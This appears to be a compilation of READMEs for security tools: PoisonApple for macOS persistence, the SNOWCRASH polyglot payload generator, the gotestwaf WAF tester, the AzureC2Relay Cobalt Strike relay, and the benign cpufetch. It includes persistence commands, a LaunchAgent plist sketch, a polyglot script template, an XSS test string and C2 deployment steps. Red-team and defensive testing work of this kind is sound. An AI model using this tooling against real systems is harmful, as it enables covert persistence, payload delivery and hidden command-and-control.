    .' '. |. | | | | |__ --| | | | |
    '-."~". .-' |. ____|_____|__|_____|_____|__|__|
    } ` } { |: | _______ __
    } } } { |::.| | _ .-----.-----| |-----.
    } ` } { `---' |. | | | | | | | -__|
    .-'"~" '-. |. _ | __| __|__|_____|
    '. .' |: | |__| |__|
    '-_.._-' |::.|:. |
    `--- ---' v0.2.0

    +--------------------+
    | AtJob |
    +--------------------+
    | Bashrc |
    +--------------------+
    | Cron |
    +--------------------+
    | CronRoot |
    +--------------------+
    | Emond |
    +--------------------+
    | LaunchAgent |
    +--------------------+
    | LaunchAgentUser |
    +--------------------+
    | LaunchDaemon |
    +--------------------+
    | LoginHook |
    +--------------------+
    | LoginHookUser |
    +--------------------+
    | LoginItem |
    +--------------------+
    | LogoutHook |
    +--------------------+
    | LogoutHookUser |
    +--------------------+
    | Periodic |
    +--------------------+
    | Reopen |
    +--------------------+
    | Zshrc |
    +--------------------+

    Apply a persistence mechanism:

    $ poisonapple -t LaunchAgentUser -n testing
    , _______ __
    .-.:|.-. | _ .-----|__|-----.-----.-----.
    .' '. |. | | | | |__ --| | | | |
    '-."~". .-' |. ____|_____|__|_____|_____|__|__|
    } ` } { |: | _______ __
    } } } { |::.| | _ .-----.-----| |-----.
    } ` } { `---' |. | | | | | | | -__|
    .-'"~" '-. |. _ | __| __|__|_____|
    '. .' |: | |__| |__|
    '-_.._-' |::.|:. |
    `--- ---' v0.2.0

    [+] Success! The persistence mechanism action was successful: LaunchAgentUser

    If no command is specified (-c), a default trigger command will be used, which writes to a file on the Desktop every time the persistence mechanism is triggered:

    $ cat ~/Desktop/PoisonApple-LaunchAgentUser
    Triggered @ Tue Mar 23 17:46:02 CDT 2021
    Triggered @ Tue Mar 23 17:46:13 CDT 2021
    Triggered @ Tue Mar 23 17:46:23 CDT 2021
    Triggered @ Tue Mar 23 17:46:33 CDT 2021
    Triggered @ Tue Mar 23 17:46:43 CDT 2021
    Triggered @ Tue Mar 23 17:46:53 CDT 2021
    Triggered @ Tue Mar 23 17:47:03 CDT 2021
    Triggered @ Tue Mar 23 17:47:13 CDT 2021
    Triggered @ Tue Mar 23 17:48:05 CDT 2021
    Triggered @ Tue Mar 23 17:48:15 CDT 2021
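
    Under the hood, a user LaunchAgent persistence like the one above amounts to dropping a property list into ~/Library/LaunchAgents. The sketch below illustrates the idea in Python; it is not PoisonApple's actual code, the label and command are made up, and it writes to a temporary directory instead of installing anything:

```python
import plistlib
import tempfile
from pathlib import Path

def write_launch_agent(label: str, command: str, agents_dir: Path) -> Path:
    """Write a minimal LaunchAgent plist that runs `command` via /bin/sh."""
    plist = {
        "Label": label,
        "ProgramArguments": ["/bin/sh", "-c", command],
        "RunAtLoad": True,  # fire once when the agent is loaded (e.g. at login)
    }
    path = agents_dir / f"{label}.plist"
    with open(path, "wb") as f:
        plistlib.dump(plist, f)
    return path

# Demo: write to a temp dir instead of ~/Library/LaunchAgents
with tempfile.TemporaryDirectory() as tmp:
    p = write_launch_agent("com.example.testing",
                           'date >> "$HOME/Desktop/PoisonApple-LaunchAgentUser"',
                           Path(tmp))
    print(p.name)  # com.example.testing.plist
```

    On a real system the plist would go into ~/Library/LaunchAgents and be picked up by launchd at the next login (or via launchctl load), which is what the -r switch later undoes.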

    Remove a persistence mechanism:

    $ poisonapple -t LaunchAgentUser -n testing -r
    ...

    Use a custom command:

    $ poisonapple -t LaunchAgentUser -n foo -c "echo foo >> /Users/user/Desktop/foo"
    ...


    SNOWCRASH - A Polyglot Payload Generator


    SNOWCRASH creates a script that can be launched on both Linux and Windows machines. The payload selected by the user (in this case, combined Bash and PowerShell code) is embedded into a single, platform-agnostic polyglot template.

    A few payloads are available, including command execution, reverse shell establishment, binary execution, and more :>
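
    To illustrate the polyglot idea (this is not SNOWCRASH's actual template), one common bash/PowerShell trick is to hide each interpreter's section inside the other's comment or string syntax. A hypothetical generator:

```python
# Hypothetical polyglot template: the first line is inert in both shells,
# `: '...'` swallows the PowerShell comment opener in bash, and the
# `<#' ... #>` block comments out the bash section in PowerShell.
POLYGLOT_TEMPLATE = """echo --% >/dev/null;: ' | out-null
<#'
{bash_payload}
exit
#>
{powershell_payload}
"""

def build_polyglot(bash_payload: str, powershell_payload: str) -> str:
    """Embed a bash payload and a PowerShell payload in one script."""
    return POLYGLOT_TEMPLATE.format(bash_payload=bash_payload,
                                    powershell_payload=powershell_payload)

script = build_polyglot('echo "hello from bash"',
                        'Write-Output "hello from powershell"')
print(script)
```

    In bash, the quoted argument to `:` absorbs the `<#'` line and `exit` stops execution before the PowerShell section; in PowerShell, `--%` neutralizes the first line and the `<#' ... #>` block comment hides the bash section.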


    Basic usage
    1. Install dependencies: ./install.sh

    2. List available payloads: ./snowcrash --list

    3. Generate chosen payload: ./snowcrash --payload memexec --out polyglot_script

    4. Change extension of the polyglot script: mv polyglot_script polyglot_script.ps1

    5. Execute polyglot script on the target machine


    Additional notes

    The delay between script start and payload execution can be specified as an interval (using the --sleep flag) in the form:

    x[s|m|h]

    where

    x = Amount of time to spend in the idle state
    s = Seconds
    m = Minutes
    h = Hours
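
    The interval format above can be parsed in a few lines. A hypothetical sketch (not SNOWCRASH's actual parser):

```python
import re

UNIT_SECONDS = {"s": 1, "m": 60, "h": 3600}

def parse_interval(spec: str) -> int:
    """Convert an interval like '30s', '5m' or '2h' to seconds."""
    match = re.fullmatch(r"(\d+)([smh])", spec)
    if not match:
        raise ValueError(f"invalid interval: {spec!r}")
    amount, unit = match.groups()
    return int(amount) * UNIT_SECONDS[unit]

print(parse_interval("5m"))  # 300
```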

    After generation, the extension of the generated script containing the payload can be set to either .sh or .ps1 (depending on the platform we want to target).

    The generated payload can be written directly to STDOUT (instead of to a file) using the --stdout flag.


    Screenshots





    Gotestwaf - Go Test WAF Is A Tool To Test Your WAF Detection Capabilities Against Different Types Of Attacks And By-Pass Techniques



    An open-source Go project to test different web application firewalls (WAF) for detection logic and bypasses.


    How it works

    Request generation is a 3-step process that multiplies the payloads by the encoders and placeholders. Let's say you defined 2 payloads, 3 encoders (Base64, JSON, and URLencode), and 1 placeholder (HTTP GET variable). In this case, the tool will send 2x3x1 = 6 requests in a test case.
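
    The multiplication is just a Cartesian product of payloads, encoders, and placeholders. A simplified sketch of the idea (not gotestwaf's actual Go code; the encoder and placeholder names and the target URL here are illustrative):

```python
import base64
import itertools
import json
from urllib.parse import quote

payloads = ["<script>alert(111)</script>", "' or 1=1 --"]

encoders = {
    "Base64": lambda s: base64.b64encode(s.encode()).decode(),
    "JSON":   lambda s: json.dumps(s),
    "URL":    lambda s: quote(s, safe=""),
}

# One placeholder: an HTTP GET parameter.
placeholders = {
    "URLParam": lambda v: f"http://target.local/?test={v}",
}

requests = [
    (enc_name, ph_name, place(encode(payload)))
    for payload, (enc_name, encode), (ph_name, place)
    in itertools.product(payloads, encoders.items(), placeholders.items())
]

print(len(requests))  # 2 payloads x 3 encoders x 1 placeholder = 6
```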


    Payload

    The payload string you want to send, like <script>alert(111)</script> or something more sophisticated. There are no macros so far, but they are on our TODO list. Since it's a YAML string, use binary encoding if needed: https://yaml.org/type/binary.html


    Encoder

    The data encoder the tool should apply to the payload: Base64, JSON unicode (\u0027 instead of '), etc.


    Placeholder

    A place inside the HTTP request where the encoded payload should go, such as a URL parameter, the URI, a POST form parameter, or a JSON POST body.


    Quick start

    Dockerhub

    The latest gotestwaf is always available via the Docker Hub repository: https://hub.docker.com/r/wallarm/gotestwaf
    It can be easily pulled via the following command:

    docker pull wallarm/gotestwaf

    Local Docker build
    docker build . --force-rm -t gotestwaf
    docker run -v ${PWD}/reports:/go/src/gotestwaf/reports gotestwaf --url=https://the-waf-you-wanna-test/

    Find the report file waf-test-report-<date>.pdf in the reports folder that you mapped to /go/src/gotestwaf/reports inside the container.


    Build

    Gotestwaf supports all the popular platforms (Linux, Windows, macOS), and can be built natively if Go is installed in the system.

    go build -mod vendor

    Examples

    Testing on OWASP ModSecurity Core Rule Set

    Build & run ModSecurity CRS docker image

    You can pull, build, and run the ModSecurity CRS docker image automatically:

    make modsec

    Or manually with your configuration flags to test:

    docker pull owasp/modsecurity-crs
    docker run -p 8080:80 -d -e PARANOIA=1 --rm owasp/modsecurity-crs

    You may raise the PARANOIA level to increase the strictness of the rule set.
    Learn more: https://coreruleset.org/faq/


    Run gotestwaf

    If you want to test the functionality on the running ModSecurity CRS docker container, you can use the following commands:

    make scan_local               (to run natively)
    make scan_local_from_docker (to run from docker)

    Or manually from docker:

    docker run -v ${PWD}/reports:/go/src/gotestwaf/reports --network="host" gotestwaf --url=http://127.0.0.1:8080/ --verbose

    And manually with go run (natively):

    go run ./cmd --url=http://127.0.0.1:8080/ --verbose

    Run gotestwaf with WebSocket check

    You can additionally set a WebSocket URL to check via the --wsURL flag, and use the --verbose flag to include more information about the checking process:

    docker run -v ${PWD}/reports:/go/src/gotestwaf/reports gotestwaf --url=http://172.17.0.1:8080/ --wsURL=ws://172.17.0.1:8080/api/ws --verbose

    Check results
    GOTESTWAF : 2021/03/03 15:15:48.072331 main.go:61: Test cases loading started
    GOTESTWAF : 2021/03/03 15:15:48.077093 main.go:68: Test cases loading finished
    GOTESTWAF : 2021/03/03 15:15:48.077123 main.go:74: Scanned URL: http://127.0.0.1:8080/
    GOTESTWAF : 2021/03/03 15:15:48.083134 main.go:85: WAF pre-check: OK. Blocking status code: 403
    GOTESTWAF : 2021/03/03 15:15:48.083179 main.go:97: WebSocket pre-check. URL to check: ws://127.0.0.1:8080/
    GOTESTWAF : 2021/03/03 15:15:48.251824 main.go:101: WebSocket pre-check: connection is not available, reason: websocket: bad handshake
    GOTESTWAF : 2021/03/03 15:15:48.252047 main.go:129: Scanning http://127.0.0.1:8080/
    GOTESTWAF : 2021/03/03 15:15:48.252076 scanner.go:124: Scanning started
    GOTESTWAF : 2021/03/03 15:15:51.210216 scanner.go:129: Scanning Time: 2.958076338s
    GOTESTWAF : 2021/03/03 15:15:51.210235 scanner.go:160: Scanning finished

    Negative Tests:
    +-----------------------+-----------------------+-----------------------+-----------------------+-----------------------+-----------------------+
    | TEST SET | TEST CASE | PERCENTAGE, % | BLOCKED | BYPASSED | UNRESOLVED |
    +-----------------------+-----------------------+-----------------------+-----------------------+-----------------------+-----------------------+
    | community | community-lfi | 66.67 | 4 | 2 | 0 |
    | community | community-rce | 14.29 | 6 | 36 | 0 |
    | community | community-sqli | 70.83 | 34 | 14 | 0 |
    | community | community-xss | 91.78 | 279 | 25 | 0 |
    | community | community-xxe | 100.00 | 4 | 0 | 0 |
    | owasp | ldap-injection | 0.00 | 0 | 8 | 0 |
    | owasp | mail-injection | 0.00 | 0 | 6 | 6 |
    | owasp | nosql-injection | 0.00 | 0 | 12 | 6 |
    | owasp | path-traversal | 38.89 | 7 | 11 | 6 |
    | owasp | shell-injection | 37.50 | 3 | 5 | 0 |
    | owasp | sql-injection | 33.33 | 8 | 16 | 8 |
    | owasp | ss-include | 50.00 | 5 | 5 | 10 |
    | owasp | sst-injection | 45.45 | 5 | 6 | 9 |
    | owasp | xml-injection | 100.00 | 12 | 0 | 0 |
    | owasp | xss-scripting | 56.25 | 9 | 7 | 12 |
    | owasp-api | graphql | 100.00 | 1 | 0 | 0 |
    | owasp-api | rest | 100.00 | 2 | 0 | 0 |
    | owasp-api | soap | 100.00 | 2 | 0 | 0 |
    +-----------------------+-----------------------+-----------------------+-----------------------+-----------------------+-----------------------+
    | DATE: | WAF NAME: | WAF AVERAGE SCORE: | BLOCKED (RESOLVED): | BYPASSED (RESOLVED): | UNRESOLVED: |
    | 2021-03-03 | GENERIC | 55.83% | 381/534 (71.35%) | 153/534 (28.65%) | 57/591 (9.64%) |
    +-----------------------+-----------------------+-----------------------+-----------------------+-----------------------+-----------------------+

    Positive Tests:
    +-----------------------+-----------------------+-----------------------+-----------------------+-----------------------+-----------------------+
    | TEST SET | TEST CASE | PERCENTAGE, % | BLOCKED | BYPASSED | UNRESOLVED |
    +-----------------------+-----------------------+-----------------------+-----------------------+-----------------------+-----------------------+
    | false-pos | texts | 50.00 | 1 | 1 | 6 |
    +-----------------------+-----------------------+-----------------------+-----------------------+-----------------------+-----------------------+
    | DATE: | WAF NAME: | WAF POSITIVE SCORE: | FALSE POSITIVE (RES): | TRUE POSITIVE (RES): | UNRESOLVED: |
    | 2021-03-03 | GENERIC | 50.00% | 1/2 (50.00%) | 1/2 (50.00%) | 6/8 (75.00%) |
    +-----------------------+-----------------------+-----------------------+-----------------------+-----------------------+-----------------------+

    PDF report is ready: reports/waf-evaluation-report-generic-2021-March-03-15-15-51.pdf


    Configuration options
    Usage of /go/src/gotestwaf/gotestwaf:
    --blockRegex string Regex to detect a blocking page with the same HTTP response status code as a not blocked request
    --blockStatusCode int HTTP status code that WAF uses while blocking requests (default 403)
    --configPath string Path to the config file (default "config.yaml")
    --followCookies If true, use cookies sent by the server. May work only with --maxIdleConns=1
    --idleConnTimeout int The maximum amount of time a keep-alive connection will live (default 2)
    --maxIdleConns int The maximum number of keep-alive connections (default 2)
    --maxRedirects int The maximum number of handling redirects (default 50)
    --nonBlockedAsPassed If true, count requests that weren't blocked as passed. If false, count requests that don't satisfy passStatusCode/passRegex as blocked
    --passRegex string Regex to a detect normal (not blocked) web page with the same HTTP status code as a blocked request
    --passStatusCode int HTTP response status code that WAF uses while passing requests (default 200)
    --proxy string Proxy URL to use
    --randomDelay int Random delay in ms in addition to the delay between requests (default 400)
    --reportPath string A directory to store reports (default "reports")
    --sendDelay int Delay in ms between requests (default 400)
    --testCase string If set then only this test case will be run
    --testCasesPath string Path to a folder with test cases (default "testcases")
    --testSet string If set then only this test set's cases will be run
    --tlsVerify If true, the received TLS certificate will be verified
    --url string URL to check (default "http://localhost/")
    --verbose If true, enable verbose logging (default true)
    --wafName string Name of the WAF product (default "generic")
    --workers int The number of workers to scan (default 200)
    --wsURL string WebSocket URL to check


    AzureC2Relay - An Azure Function That Validates And Relays Cobalt Strike Beacon Traffic By Verifying The Incoming Requests Based On A Cobalt Strike Malleable C2 Profile



    AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying incoming requests against a Cobalt Strike Malleable C2 profile. Any incoming request that does not share the profile's user-agent, URI paths, headers, and query parameters will be redirected to a configurable decoy website. The validated C2 traffic is relayed to a team server within the same virtual network, which is further restricted by a network security group that allows the VM to expose only SSH.
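
    Conceptually, the relay's validation is a set of equality checks of each incoming request against fields taken from the malleable profile. An illustrative Python sketch (AzureC2Relay itself is a C# Azure Function; the profile fields, URLs, and function names here are hypothetical):

```python
# Fields lifted from a (hypothetical) malleable C2 profile.
PROFILE = {
    "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "uri_paths": {"/api/v1/updates", "/api/v1/telemetry"},
    "required_headers": {"Accept": "application/json"},
}

DECOY_URL = "https://decoy.example.com/"
TEAMSERVER_URL = "https://10.0.0.4/"

def route(path: str, headers: dict) -> str:
    """Return the relay target: the team server for profile-matching
    traffic, the decoy website for everything else."""
    if headers.get("User-Agent") != PROFILE["user_agent"]:
        return DECOY_URL
    if path not in PROFILE["uri_paths"]:
        return DECOY_URL
    for name, value in PROFILE["required_headers"].items():
        if headers.get(name) != value:
            return DECOY_URL
    return TEAMSERVER_URL
```

    Anything a scanner or analyst sends without the exact profile fingerprint never reaches the team server, which is the point of fronting it with the function.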


    Deploy

    AzureC2Relay is deployed via Terraform Azure modules as well as some local az CLI commands.

    Make sure you have terraform, az cli, and the .NET Core 3.1 runtime installed.

    Windows (Powershell)

    &([scriptblock]::Create((Invoke-WebRequest -UseBasicParsing 'https://dot.net/v1/dotnet-install.ps1'))) -runtime dotnet -version 3.1.0
    Invoke-WebRequest 'https://releases.hashicorp.com/terraform/0.14.6/terraform_0.14.6_windows_amd64.zip' -OutFile 'terraform.zip'
    Expand-Archive -Path terraform.zip -DestinationPath "$([Environment]::GetFolderPath('ApplicationData'))\TerraForm\"
    setx PATH "%PATH%;$([Environment]::GetFolderPath('ApplicationData'))\TerraForm\"
    Invoke-WebRequest -Uri https://aka.ms/installazurecliwindows -OutFile .\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I AzureCLI.msi /quiet'; rm .\AzureCLI.msi

    Mac

    curl -L https://dot.net/v1/dotnet-install.sh | bash -s --  --runtime dotnet --version 3.1.0
    brew update
    brew tap hashicorp/tap
    brew install hashicorp/tap/terraform
    brew install azure-cli

    Ubuntu , Debian

    curl -L https://dot.net/v1/dotnet-install.sh | bash -s --  --runtime dotnet --version 3.1.0
    wget https://releases.hashicorp.com/terraform/0.14.5/terraform_0.14.5_linux_amd64.zip
    unzip terraform_0.14.5_linux_amd64.zip
    sudo cp terraform /usr/local/bin/terraform
    curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash

    Kali

    curl -L https://dot.net/v1/dotnet-install.sh | bash -s --  --runtime dotnet --version 3.1.0
    wget https://releases.hashicorp.com/terraform/0.14.5/terraform_0.14.5_linux_amd64.zip
    unzip terraform_0.14.5_linux_amd64.zip
    sudo cp terraform /usr/local/bin/terraform
    echo "deb [arch=amd64] https://packages.microsoft.com/repos/azure-cli/ stretch main" | sudo tee /etc/apt/sources.list.d/azure-cli.list
    curl -L https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add -
    sudo apt-get update && sudo apt-get install apt-transport-https azure-cli
    1. Modify the first variables defined in config.tf to suit your needs
    2. Replace the dummy "cobaltstrike-dist.tgz" with an actual Cobalt Strike download
    3. Edit/Replace the Malleable profile inside the Resources folder (make sure the profile filename matches the variables you set in step 1)
    4. Log in to Azure: az login
    5. run terraform init
    6. run terraform apply -auto-approve to deploy the infra
    7. Wait for the CDN to become active and enjoy!

    Once terraform completes, it will provide you with the needed SSH command; the Cobalt Strike team server will be running inside a tmux session on the deployed VM.

    When you're done using the infra, you can remove it with terraform destroy -auto-approve



    Cpufetch - Simplistic Yet Fancy CPU Architecture Fetching Tool



    Simplistic yet fancy CPU architecture fetching tool


    1. Support

    cpufetch currently supports x86_64 CPUs (both Intel and AMD) and ARM.

    • Linux: x86_64 ✔️, ARM ✔️. Preferred platform; experimental ARM support.
    • Windows: x86_64 ✔️. Some information may be missing; colors will be used if supported.
    • Android: ARM ✔️. Experimental ARM support.
    • macOS: x86_64 ✔️. Some information may be missing.

    (✔️ = supported; platform/architecture combinations without a check mark are not supported or not tested.)

    2. Installation

    2.1 Building from source

    Just clone the repo and use make to compile it:

    git clone https://github.com/Dr-Noob/cpufetch
    cd cpufetch
    make
    ./cpufetch

    The Makefile is designed to work on Linux, Windows and macOS.


    2.2 Linux

    There is a cpufetch package available in Arch Linux (cpufetch-git). If you are on another distribution, you can build cpufetch from source.


    2.3 Windows

    In the releases section you will find some cpufetch executables compiled for Windows. Just download and run it from the Windows CMD. You can also build cpufetch from source.


    2.4 macOS

    You need to build cpufetch from source.


    2.5 Android
    1. Install the termux app (terminal emulator)
    2. Run pkg install -y git make clang inside termux.
    3. Build from source as usual (see section 2.1).

    3. Examples

    Here are more examples of how cpufetch looks on different CPUs.


    3.1 x86_64 CPUs




    3.2 ARM CPUs

     



    4. Colors and style

    By default, cpufetch will print the CPU art with the system colorscheme. However, you can always set a custom color scheme, either specifying Intel or AMD, or specifying the colors in RGB format:

    ./cpufetch --color intel (default color for Intel)
    ./cpufetch --color amd (default color for AMD)
    ./cpufetch --color 239,90,45:210,200,200:100,200,45:0,200,200 (example)

    When setting the colors using RGB, 4 colors must be given in the format R,G,B:R,G,B:R,G,B:R,G,B. The first two colors are used for the CPU art and the last two for the text, so you can customize all the colors.
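
    A sketch of how such a color argument can be parsed (cpufetch itself is written in C; this Python snippet just illustrates the format):

```python
def parse_colors(spec: str) -> list[tuple[int, int, int]]:
    """Parse 'R,G,B:R,G,B:R,G,B:R,G,B' into four RGB tuples:
    two for the CPU art and two for the text."""
    groups = spec.split(":")
    if len(groups) != 4:
        raise ValueError("expected exactly 4 colors")
    colors = []
    for group in groups:
        r, g, b = (int(part) for part in group.split(","))
        if not all(0 <= c <= 255 for c in (r, g, b)):
            raise ValueError(f"channel out of range in {group!r}")
        colors.append((r, g, b))
    return colors

print(parse_colors("239,90,45:210,200,200:100,200,45:0,200,200")[0])  # (239, 90, 45)
```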


    5. Implementation

    See cpufetch programming documentation.


    6. Bugs or improvements

    There are many open issues on GitHub (see issues). Feel free to open a new one to report a problem or propose any improvement to cpufetch.

    I would like to thank Gonzalocl and OdnetninI for their help running cpufetch on the many different CPUs they have access to, which makes it easier to debug and verify the correctness of cpufetch.


